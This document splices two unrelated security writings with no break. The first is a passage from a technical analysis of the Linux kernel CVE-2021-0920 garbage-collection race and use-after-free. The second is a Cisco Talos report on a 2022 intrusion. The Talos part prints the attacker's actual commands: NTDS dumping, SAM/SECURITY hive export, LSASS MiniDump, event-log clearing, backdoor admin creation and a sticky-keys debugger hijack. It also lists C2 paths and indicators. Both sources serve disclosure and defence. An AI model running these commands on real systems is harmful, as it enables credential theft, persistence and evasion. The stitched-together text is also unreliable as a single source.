count will be decremented. Let’s revisit the reference count cycle scenario before the close syscall. This cycle is breakable because any socket files can receive the transmitted file and break the reference cycle: Breakable cycle before close A and B After closing both of the file descriptors, the reference count equals the inflight count for each of the socket file descriptors, which is a sign of possible garbage: Unbreakable cycle after close A and B Now, let’s check another example. Assume we have sockets A, B and 𝛼: 1. A sends socket A to socket B. 2. B sends socket B to socket A. 3. B sends socket B to socket 𝛼. 4. 𝛼 sends socket 𝛼 to socket B. 5. Close A. 6. Close B. Breakable cycle for A, B and 𝛼 The cycle is breakable, because we can get newly installed file descriptor B from the socket file descriptor 𝛼 and newly installed file descriptor A' from B’. ## Garbage Collection A high level view of garbage collection is available from lwn.net: "If, instead, the two counts are equal, that file structure might be part of an unreachable cycle. To determine whether that is the case, the kernel finds the set of all in-flight Unix-domain sockets for which all references are contained in SCM_RIGHTS datagrams (for which f_count and inflight are equal, in other words). It then counts how many references to each of those sockets come from SCM_RIGHTS datagrams attached to sockets in this set. Any socket that has references coming from outside the set is reachable and can be removed from the set. If it is reachable, and if there are any SCM_RIGHTS datagrams waiting to be consumed attached to it, the files contained within that datagram are also reachable and can be removed from the set. At the end of an iterative process, the kernel may find itself with a set of in-flight Unix-domain sockets that are only referenced by unconsumed (and unconsumable) SCM_RIGHTS datagrams; at this point, it has a cycle of file structures holding the only references to each other. Removing those datagrams from the queue, releasing the references they hold, and discarding them will break the cycle." To be more specific, the SCM_RIGHTS garbage collection system was developed in order to handle the unbreakable reference cycles. To identify which file descriptors are a part of unbreakable cycles: 1. Add any unix_sock objects whose reference count equals its inflight count to the gc_candidates list. 2. Determine if the socket is referenced by any sockets outside of the gc_candidates list. If it is then it is reachable, remove it and any sockets it references from the gc_candidates list. Repeat until no more reachable sockets are found. 3. After this iterative process, only sockets who are solely referenced by other sockets within the gc_candidates list are left. Let’s take a closer look at how this garbage collection process works. First, the kernel finds all the unix_sock objects whose reference counts equals their inflight count and puts them into the gc_candidates list (garbage.c#L242):  list_for_each_entry_safe(u, next, &gc_inflight_list, link) { long total_refs; long inflight_refs; total_refs = file_count(u->sk.sk_socket->file); inflight_refs = atomic_long_read(&u->inflight); BUG_ON(inflight_refs < 1); BUG_ON(total_refs < inflight_refs); if (total_refs == inflight_refs) { list_move_tail(&u->link, &gc_candidates); __set_bit(UNIX_GC_CANDIDATE, &u->gc_flags); __set_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags); } } Next, the kernel removes any sockets that are referenced by other sockets outside of the current gc_candidates list. To do this, the kernel invokes scan_children (garbage.c#138) along with the function pointer dec_inflight to iterate through each candidate’s sk->receive_queue. It decreases the inflight count for each of the passed file descriptors that are themselves candidates for garbage collection (garbage.c#L261):  /* Now remove all internal in-flight reference to children of * the candidates. */ list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, dec_inflight, NULL); After iterating through all the candidates, if a gc candidate still has a positive inflight count it means that it is referenced by objects outside of the gc_candidates list and therefore is reachable. These candidates should not be included in the gc_candidates list so the related inflight counts need to be restored. To do this, the kernel will put the candidate to not_cycle_list instead and iterates through its receiver queue of each transmitted file in the gc_candidates list (garbage.c#L281) and increments the inflight count back. The entire process is done recursively, in order for the garbage collection to avoid purging reachable sockets:  /* Restore the references for children of all candidates, * which have remaining references. Do this recursively, so * only those remain, which form cyclic references. * * Use a "cursor" link, to make the list traversal safe, even * though elements might be moved about. */ list_add(&cursor, &gc_candidates); while (cursor.next != &gc_candidates) { u = list_entry(cursor.next, struct unix_sock, link); /* Move cursor to after the current position. */ list_move(&cursor, &u->link); if (atomic_long_read(&u->inflight) > 0) { list_move_tail(&u->link, ¬_cycle_list); __clear_bit(UNIX_GC_MAYBE_CYCLE, &u->gc_flags); scan_children(&u->sk, inc_inflight_move_tail, NULL); } } list_del(&cursor); Now gc_candidates contains only “garbage”. The kernel restores original inflight counts from gc_candidates, moves candidates from not_cycle_list back to gc_inflight_list and invokes __skb_queue_purge for cleaning up garbage (garbage.c#L306).  /* Now gc_candidates contains only garbage. Restore original * inflight counters for these as well, and remove the skbuffs * which are creating the cycle(s). */ skb_queue_head_init(&hitlist); list_for_each_entry(u, &gc_candidates, link) scan_children(&u->sk, inc_inflight, &hitlist); /* not_cycle_list contains those sockets which do not make up a * cycle. Restore these to the inflight list. */ while (!list_empty(¬_cycle_list)) { u = list_entry(not_cycle_list.next, struct unix_sock, link); __clear_bit(UNIX_GC_CANDIDATE, &u->gc_flags); list_move_tail(&u->link, &gc_inflight_list); } spin_unlock(&unix_gc_lock); /* Here we are. Hitlist is filled. Die. */ __skb_queue_purge(&hitlist); spin_lock(&unix_gc_lock); __skb_queue_purge clears every skb from the receiver queue:  /** * __skb_queue_purge - empty a list * @list: list to empty * * Delete all buffers on an &sk_buff list. Each buffer is removed from * the list and one reference dropped. This function does not take the * list lock and the caller must hold the relevant locks to use it. */ void skb_queue_purge(struct sk_buff_head *list); static inline void __skb_queue_purge(struct sk_buff_head *list) { struct sk_buff *skb; while ((skb = __skb_dequeue(list)) != NULL) kfree_skb(skb); } There are two ways to trigger the garbage collection process: 1. wait_for_unix_gc is invoked at the beginning of the sendmsg function if there are more than 16,000 inflight sockets 2. When a socket file is released by the kernel (i.e., a file descriptor is closed), the kernel will directly invoke unix_gc. Note that unix_gc is not preemptive. If garbage collection is already in process, the kernel will not perform another unix_gc invocation. Now, let’s check this example (a breakable cycle) with a pair of sockets f00 and f01, and a single socket 𝛼: 1. Socket f 00 sends socket f 00 to socket f 01. 2. Socket f 01 sends socket f 01 to socket 𝛼. 3. Close f 00. 4. Close f 01. Before starting the garbage collection process, the status of socket file descriptors are: • f 00: ref = 1, inflight = 1 • f 01: ref = 1, inflight = 1 • 𝛼: ref = 1, inflight = 0 Breakable cycle by f 00, f 01 and 𝛼 During the garbage collection process, f 00 and f 01 are considered garbage candidates. The inflight count of f 00 is dropped to zero, but the count of f 01 is still 1 because 𝛼 is not a candidate. Thus, the kernel will restore the inflight count from f 01’s receive queue. As a result, f 00 and f 01 are not treated as garbage anymore. # CVE-2021-0920 Root Cause Analysis When a user receives SCM_RIGHTS message from recvmsg without the MSG_PEEK flag, the kernel will wait until the garbage collection process finishes if it is in progress. However, if the MSG_PEEK flag is on, the kernel will increment the reference count of the transmitted file structures without synchronizing with any ongoing garbage collection process. This may lead to inconsistency of the internal garbage collection state, making the garbage collector mark a non-garbage sock object as garbage to purge. ## recvmsg without MSG_PEEK flag The kernel function unix_stream_read_generic (af_unix.c#L2290) parses the SCM_RIGHTS message and manages the file inflight count when the MSG_PEEK flag is NOT set. Then, the function unix_stream_read_generic calls unix_detach_fds to decrement the inflight count. Then, unix_detach_fds clears the list of passed file descriptors (scm_fp_list) from the skb:  static void unix_detach_fds(struct scm_cookie *scm, struct sk_buff *skb) { int i; scm->fp = UNIXCB(skb).fp; UNIXCB(skb).fp = NULL; for (i = scm->fp->count-1; i >= 0; i--) unix_notinflight(scm->fp->user, scm->fp->fp[i]); } The unix_notinflight from unix_detach_fds will reverse the effect of unix_inflight by decrementing the inflight count:  void unix_notinflight(struct user_struct *user, struct file *fp) { struct sock *s = unix_get_socket(fp); spin_lock(&unix_gc_lock); if (s) { struct unix_sock *u = unix_sk(s); BUG_ON(!atomic_long_read(&u->inflight)); BUG_ON(list_empty(&u->link)); if (atomic_long_dec_and_test(&u->inflight)) list_del_init(&u->link); unix_tot_inflight--; } user->unix_inflight--; spin_unlock(&unix_gc_lock); } Later skb_unlink and consume_skb are invoked from unix_stream_read_generic (af_unix.c#2451) to destroy the current skb. Following the call chain kfree(skb)->__kfree_skb, the kernel will invoke the function pointer skb->destructor (code) which redirects to unix_destruct_scm:  static void unix_destruct_scm(struct sk_buff *skb) { struct scm_cookie scm; memset(&scm, 0, sizeof(scm)); scm.pid = UNIXCB(skb).pid; if (UNIXCB(skb).fp) unix_detach_fds(&scm, skb); /* Alas, it calls VFS */ /* So fscking what? fput() had been SMP-safe since the last Summer */ scm_destroy(&scm); sock_wfree(skb); } In fact, the unix_detach_fds will not be invoked again here from unix_destruct_scm because UNIXCB(skb).fp is already cleared by unix_detach_fds. Finally, fd_install(new_fd, get_file(fp[i])) from scm_detach_fds is invoked for installing a new file descriptor. ## recvmsg with MSG_PEEK flag The recvmsg process is different if the MSG_PEEK flag is set. The MSG_PEEK flag is used during receive to “peek” at the message, but the data is treated as unread. unix_stream_read_generic will invoke scm_fp_dup instead of unix_detach_fds. This increases the reference count of the inflight file (af_unix.c#2149):  /* It is questionable, see note in unix_dgram_recvmsg. */ if (UNIXCB(skb).fp) scm.fp = scm_fp_dup(UNIXCB(skb).fp); sk_peek_offset_fwd(sk, chunk); if (UNIXCB(skb).fp) break; Because the data should be treated as unread, the skb is not unlinked and consumed when the MSG_PEEK flag is set. However, the receiver will still get a new file descriptor for the inflight socket. ## recvmsg Examples Let’s see a concrete example. Assume there are the following socket pairs: • f 00, f 01 • f 10, f 11 Now, the program does the following operations: • f 00 → [f 00] → f 01 (means f 00 sends [f 00] to f 01) • f 10 → [f 00] → f 11 • Close(f 00) Breakable cycle by f 00, f 01, f 10 and f 11 Here is the status: • inflight(f 00) = 2, ref(f 00) = 2 • inflight(f 01) = 0, ref(f 01) = 1 • inflight(f 10) = 0, ref(f 10) = 1 • inflight(f 11) = 0, ref(f 11) = 1 If the garbage collection process happens now, before any recvmsg calls, the kernel will choose f 00 as the garbage candidate. However, f 00 will not have the inflight count altered and the kernel will not purge any garbage. If f 01 then calls recvmsg with MSG_PEEK flag, the receive queue doesn’t change and the inflight counts are not decremented. f 01 gets a new file descriptor f 00' which increments the reference count on f 00: MSG_PEEK increment the reference count of f 00 while the receive queue is not cleared Status: • inflight(f 00) = 2, ref(f 00) = 3 • inflight(f 01) = 0, ref(f 01) = 1 • inflight(f 10) = 0, ref(f 10) = 1 • inflight(f 11) = 0, ref(f 11) = 1 Then, f 01 calls recvmsg without MSG_PEEK flag, f 01’s receive queue is removed. f 01 also fetches a new file descriptor f 00'': The receive queue of f 01 is cleared and f 01'' is obtained from f 01 Status: • inflight(f 00) = 1, ref(f 00) = 3 • inflight(f 01) = 0, ref(f 01) = 1 • inflight(f 10) = 0, ref(f 10) = 1 • inflight(f 11) = 0, ref(f 11) = 1 ## UAF Scenario From a very high level perspective, the internal state of Linux garbage collection can be non-deterministic because MSG_PEEK is not synchronized with the garbage collector. There is a race condition where the garbage collector can treat an inflight socket as a garbage candidate while the file reference is incremented at the same time during the MSG_PEEK receive. As a consequence, the garbage collector may purge the candidate, freeing the socket buffer, while a receiver may install the file descriptor, leading to a UAF on the skb object. Let’s see how the captured 0-day sample triggers the bug step by step (simplified version, in reality you may need more threads working together, but it should demonstrate the core idea). First of all, the sample allocates the following socket pairs and single socket 𝛼: • f 00, f 01 • f 10, f 11 • f 20, f 21 • f 30, f 31 • sock 𝛼 (actually there might be even thousands of 𝛼 for protracting the garbage collection process in order to evade a BUG_ON check which will be introduced later). Now, the program does the below operations: Close the following file descriptors prior to any recvmsg calls: • Close(f 00) • Close(f 01) • Close(f 11) • Close(f 10) • Close(f 30) • Close(f 31) • Close(𝛼) Here is the status: • inflight(f 00) = N + 1, ref(f 00) = N + 1 • inflight(f 01) = 2, ref(f 01) = 2 • inflight(f 10) = 3, ref(f 10) = 3 • inflight(f 11) = 1, ref(f 11) = 1 • inflight(f 20) = 0, ref(f 20) = 1 • inflight(f 21) = 0, ref(f 21) = 1 • inflight(f 31) = 1, ref(f 31) = 1 • inflight(𝛼) = 1, ref(𝛼) = 1 If the garbage collection process happens now, the kernel will do the following scrutiny: • List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates. Decrease inflight count for the candidate children in each receive queue. • Since f 21 is not considered a candidate, f 11’s inflight count is still above zero. • Recursively restore the inflight count. • Nothing is considered garbage. A potential skb UAF by race condition can be triggered by: 1. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’. 2. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’. 3. Concurrently do the following operations: 1. Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’. 2. Call recvmsg with MSG_PEEK flag from f 10 How is it possible? Let’s see a case where the race condition is not hit so there is no UAF:  Thread 0 Thread 1 Thread 2 Call unix_gc Stage0: List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’ Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp); Stage0: decrease inflight count from the child of every garbage candidate Status after stage 0: inflight(f 00) = 0 inflight(f 01) = 0 inflight(f 10) = 0 inflight(f 11) = 1 inflight(f 31) = 0 inflight(𝛼) = 0 Stage1: Recursively restore inflight count if a candidate still has inflight count. Stage1: All inflight counts have been restored. Stage2: No garbage, return. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’ Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’ Call recvmsg with MSG_PEEK flag from f 10’ Everyone is happy Everyone is happy Everyone is happy However, if the second recvmsg occurs just after stage 1 of the garbage collection process, the UAF is triggered:  Thread 0 Thread 1 Thread 2 Call unix_gc Stage0: List f 00, f 01, f 10, f 11, f 31, 𝛼 as garbage candidates. Call recvmsg with MSG_PEEK flag from f 21 to get f 11’ Increase reference count: scm.fp = scm_fp_dup(UNIXCB(skb).fp); Stage0: decrease inflight count from the child of every garbage candidates Status after stage 0: inflight(f 00) = 0 inflight(f 01) = 0 inflight(f 10) = 0 inflight(f 11) = 1 inflight(f 31) = 0 inflight(𝛼) = 0 Stage1: Start restoring inflight count. Call recvmsg with MSG_PEEK flag from f 11 to get f 10’ Call recvmsg without MSG_PEEK flag from f 11 to get f 10’’ unix_detach_fds: UNIXCB(skb).fp = NULL Blocked by spin_lock(&unix_gc_lock) Stage1: scan_inflight cannot find candidate children from f 11. Thus, the inflight count accidentally remains the same. Stage2: f 00, f 01, f 10, f 31, 𝛼 are garbage. Stage2: start purging garbage. Start calling recvmsg with MSG_PEEK flag from f 10’, which would expect to receive f 00' Get skb = skb_peek(&sk->sk_receive_queue), skb is going to be freed by thread 0. Stage2: for, calls __skb_unlink and kfree_skb later. state->recv_actor(skb, skip, chunk, state) UAF GC finished. Start garbage collection. Get f 10’’ Therefore, the race condition causes a UAF of the skb object. At first glance, we should blame the second recvmsg syscall because it clears skb.fp, the passed file list. However, if the first recvmsg syscall doesn’t set the MSG_PEEK flag, the UAF can be avoided because unix_notinflight is serialized with the garbage collection. In other words, the kernel makes sure the garbage collection is either not processed or finished before decrementing the inflight count and removing the skb. After unix_notinflight, the receiver obtains f11' and inflight sockets don't form an unbreakable cycle. Since MSG_PEEK is not serialized with the garbage collection, when recvmsg is called with MSG_PEEK set, the kernel still considers f 11 as a garbage candidate. For this reason, the following next recvmsg will eventually trigger the bug due to the inconsistent state of the garbage collection process. # Patch Analysis ## CVE-2021-0920 was found in 2016 The vulnerability was initially reported to the Linux kernel community in 2016. The researcher also provided the correct patch advice but it was not accepted by the Linux kernel community: Patch was not applied in 2016 In theory, anyone who saw this patch might come up with an exploit against the faulty garbage collector. ## Patch in 2021 Let’s check the official patch for CVE-2021-0920. For the MSG_PEEK branch, it requests the garbage collection lock unix_gc_lock before performing sensitive actions and immediately releases it afterwards:  … + spin_lock(&unix_gc_lock); + spin_unlock(&unix_gc_lock); … The patch is confusing - it’s rare to see such lock usage in software development. Regardless, the MSG_PEEK flag now waits for the completion of the garbage collector, so the UAF issue is resolved. ## BUG_ON Added in 2017 Andrey Ulanov from Google in 2017 found another issue in unix_gc and provided a fix commit. Additionally, the patch added a BUG_ON for the inflight count:  void unix_notinflight(struct user_struct *user, struct file *fp) if (s) { struct unix_sock *u = unix_sk(s); + BUG_ON(!atomic_long_read(&u->inflight)); BUG_ON(list_empty(&u->link)); if (atomic_long_dec_and_test(&u->inflight)) At first glance, it seems that the BUG_ON can prevent CVE-2021-0920 from being exploitable. However, if the exploit code can delay garbage collection by crafting a large amount of fake garbage, it can waive the BUG_ON check by heap spray. ## New Garbage CollectionDiscovered in 2021 CVE-2021-4083 deserves an honorable mention: when I discussed CVE-2021-0920 with Jann Horn and Ben Hawkes, Jann found another issue in the garbage collection, described in the Project Zero blog post Racing against the clock -- hitting a tiny kernel race window. \ # Part I Conclusion To recap, we have discussed the kernel internals of SCM_RIGHTS and the designs and implementations of the Linux kernel garbage collector. Besides, we have analyzed the behavior of MSG_PEEK flag with the recvmsg syscall and how it leads to a kernel UAF by a subtle and arcane race condition. The bug was spotted in 2016 publicly, but unfortunately the Linux kernel community did not accept the patch at that time. Any threat actors who saw the public email thread may have a chance to develop an LPE exploit against the Linux kernel. In part two, we'll look at how the vulnerability was exploited and the functionalities of the post compromise modules. # Cisco Talos shares insights related to recent cyber attack on Cisco 10 August 2022 at 19:30 ## Update History Date Description of Updates Aug. 10th 2022 Adding clarifying details on activity involving active directory. Aug. 10th 2022 Update made to the Cisco Response and Recommendations section related to MFA. ## Executive summary • On May 24, 2022, Cisco became aware of a potential compromise. Since that point, Cisco Security Incident Response (CSIRT) and Cisco Talos have been working to remediate. • During the investigation, it was determined that a Cisco employee’s credentials were compromised after an attacker gained control of a personal Google account where credentials saved in the victim’s browser were being synchronized. • The attacker conducted a series of sophisticated voice phishing attacks under the guise of various trusted organizations attempting to convince the victim to accept multi-factor authentication (MFA) push notifications initiated by the attacker. The attacker ultimately succeeded in achieving an MFA push acceptance, granting them access to VPN in the context of the targeted user. • CSIRT and Talos are responding to the event and we have not identified any evidence suggesting that the attacker gained access to critical internal systems, such as those related to product development, code signing, etc. • After obtaining initial access, the threat actor conducted a variety of activities to maintain access, minimize forensic artifacts, and increase their level of access to systems within the environment. • The threat actor was successfully removed from the environment and displayed persistence, repeatedly attempting to regain access in the weeks following the attack; however, these attempts were unsuccessful. • We assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to the UNC2447 cybercrime gang, Lapsus$ threat actor group, and Yanluowang ransomware operators.
• For further information see the Cisco Response page here.

## Initial vector

Initial access to the Cisco VPN was achieved via the successful compromise of a Cisco employee’s personal Google account. The user had enabled password syncing via Google Chrome and had stored their Cisco credentials in their browser, enabling that information to synchronize to their Google account. After obtaining the user’s credentials, the attacker attempted to bypass multifactor authentication (MFA) using a variety of techniques, including voice phishing (aka "vishing") and MFA fatigue, the process of sending a high volume of push requests to the target’s mobile device until the user accepts, either accidentally or simply to attempt to silence the repeated push notifications they are receiving. Vishing is an increasingly common social engineering technique whereby attackers try to trick employees into divulging sensitive information over the phone. In this instance, an employee reported that they received multiple calls over several days in which the callers – who spoke in English with various international accents and dialects – purported to be associated with support organizations trusted by the user.

Once the attacker had obtained initial access, they enrolled a series of new devices for MFA and authenticated successfully to the Cisco VPN. The attacker then escalated to administrative privileges, allowing them to login to multiple systems, which alerted our Cisco Security Incident Response Team (CSIRT), who subsequently responded to the incident. The actor in question dropped a variety of tools, including remote access tools like LogMeIn and TeamViewer, offensive security tools such as Cobalt Strike, PowerSploit, Mimikatz, and Impacket, and added their own backdoor accounts and persistence mechanisms.

## Post-compromise TTPs

Following initial access to the environment, the threat actor conducted a variety of activities for the purposes of maintaining access, minimizing forensic artifacts, and increasing their level of access to systems within the environment.

Once on a system, the threat actor began to enumerate the environment, using common built-in Windows utilities to identify the user and group membership configuration of the system, hostname, and identify the context of the user account under which they were operating. We periodically observed the attacker issuing commands containing typographical errors, indicating manual operator interaction was occurring within the environment.

After establishing access to the VPN, the attacker then began to use the compromised user account to logon to a large number of systems before beginning to pivot further into the environment. They moved into the Citrix environment, compromising a series of Citrix servers and eventually obtained privileged access to domain controllers.

After obtaining access to the domain controllers, the attacker began attempting to dump NTDS from them using “ntdsutil.exe” consistent with the following syntax:
powershell ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\users\public' q q
They then worked to exfiltrate the dumped NTDS over SMB (TCP/445) from the domain controller to the VPN system under their control.

After obtaining access to credential databases, the attacker was observed leveraging machine accounts for privileged authentication and lateral movement across the environment.

Consistent with activity we previously observed in other separate but similar attacks, the adversary created an administrative user called “z” on the system using the built-in Windows “net.exe” commands. This account was then added to the local Administrators group. We also observed instances where the threat actor changed the password of existing local user accounts to the same value shown below. Notably, we have observed the creation of the “z” account by this actor in previous engagements prior to the Russian invasion of Ukraine.
C:\Windows\system32\net user z Lh199211* /add
C:\Windows\system32\net localgroup administrators z /add
This account was then used in some cases to execute additional utilities, such as adfind or secretsdump, to attempt to enumerate the directory services environment and obtain additional credentials. Additionally, the threat actor was observed attempting to extract registry information, including the SAM database on compromised windows hosts.
reg save hklm\system system
reg save hklm\sam sam
reg save HKLM\security sec
On some systems, the attacker was observed employing MiniDump from Mimikatz to dump LSASS.
tasklist | findstr lsass
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [LSASS_PID] C:\windows\temp\lsass.dmp full
The attacker also took steps to remove evidence of activities performed on compromised systems by deleting the previously created local Administrator account. They also used the “wevtutil.exe” utility to identify and clear event logs generated on the system.
wevtutil.exe el
wevtutil.exe cl [LOGNAME]
In many cases, we observed the attacker removing the previously created local administrator account.
net user z /delete
To move files between systems within the environment, the threat actor often leveraged Remote Desktop Protocol (RDP) and Citrix. We observed them modifying the host-based firewall configurations to enable RDP access to systems.
netsh advfirewall firewall set rule group=remote desktop new enable=Yes
C:\Windows\System32\msiexec.exe /i C:\Users\[USERNAME]\Pictures\LogMeIn.msi
The attacker frequently leveraged Windows logon bypass techniques to maintain the ability to access systems in the environment with elevated privileges. They frequently relied upon PSEXESVC.exe to remotely add the following Registry key values:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f
This enabled the attacker to leverage the accessibility features present on the Windows logon screen to spawn a SYSTEM level command prompt, granting them complete control of the systems. In several cases, we observed the attacker adding these keys but not further interacting with the system, possibly as a persistence mechanism to be used later as their primary privileged access is revoked.

Throughout the attack, we observed attempts to exfiltrate information from the environment. We confirmed that the only successful data exfiltration that occurred during the attack included the contents of a Box folder that was associated with a compromised employee’s account and employee authentication data from active directory. The Box data obtained by the adversary in this case was not sensitive.

In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes.

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

## Backdoor analysis

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts.

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure:
/bot/cmd.php?botid=%.8x
The malware also communicates with the C2 server via HTTP GET requests that feature the following structure:
/bot/gate.php?botid=%.8x
Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.

The aforementioned HTTP requests are sent using the following user-agent string:
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33
The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:
C:\users\public\win\cmd.exe
The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack.

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations. UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more. Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of the Lapsus$. Lapsus$is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$has been observed compromising corporate environments and attempting to exfiltrate sensitive information. While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments. ## Cisco response and recommendations Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below. • Win.Exploit.Kolobko-9950675-0 • Win.Backdoor.Kolobko-9950676-0 Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information. Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious. For Duo it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from unrealistic location or attack patterns like logins brute force can help detect unauthorized access. Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment. Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment. Centralized log collection can help minimize the lack of visibility that results when an attacker take active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway. In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack. Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities. ## Mitre ATT&CK mapping All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred. ### Initial Access ### Execution ### Persistence ### Privilege Escalation ### Defense Evasion ### Credential Access ### Lateral Movement ### Discovery ### Command and Control ### Exfiltration ## Indicators of compromise The following indicators of compromise were observed associated with this attack. ### Hashes (SHA256) 184a2570d71eedc3c77b63fd9d2a066cd025d20ceef0f75d428c6f7e5c6965f3 2fc5bf9edcfa19d48e235315e8f571638c99a1220be867e24f3965328fe94a03 542c9da985633d027317e9a226ee70b4f0742dcbc59dfd2d4e59977bb870058d 61176a5756c7b953bc31e5a53580d640629980a344aa5ff147a20fb7d770b610 753952aed395ea845c52e3037f19738cfc9a415070515de277e1a1baeff20647 8df89eef51cdf43b2a992ade6ad998b267ebb5e61305aeb765e4232e66eaf79a 8e5733484982d0833abbd9c73a05a667ec2d9d005bbf517b1c8cd4b1daf57190 99be6e7e31f0a1d7eebd1e45ac3b9398384c1f0fa594565137abb14dc28c8a7f bb62138d173de997b36e9b07c20b2ca13ea15e9e6cd75ea0e8162e0d3ded83b7 eb3452c64970f805f1448b78cd3c05d851d758421896edd5dfbe68e08e783d18 ### IP Addresses 104.131.30[.]201 108.191.224[.]47 131.150.216[.]118 134.209.88[.]140 138.68.227[.]71 139.177.192[.]145 139.60.160[.]20 139.60.161[.]99 143.198.110[.]248 143.198.131[.]210 159.65.246[.]188 161.35.137[.]163 162.33.177[.]27 162.33.178[.]244 162.33.179[.]17 165.227.219[.]211 165.227.23[.]218 165.232.154[.]73 166.205.190[.]23 167.99.160[.]91 172.56.42[.]39 172.58.220[.]52 172.58.239[.]34 174.205.239[.]164 176.59.109[.]115 178.128.171[.]206 185.220.100[.]244 185.220.101[.]10 185.220.101[.]13 185.220.101[.]15 185.220.101[.]16 185.220.101[.]2 185.220.101[.]20 185.220.101[.]34 185.220.101[.]45 185.220.101[.]6 185.220.101[.]65 185.220.101[.]73 185.220.101[.]79 185.220.102[.]242 185.220.102[.]250 192.241.133[.]130 194.165.16[.]98 195.149.87[.]136 24.6.144[.]43 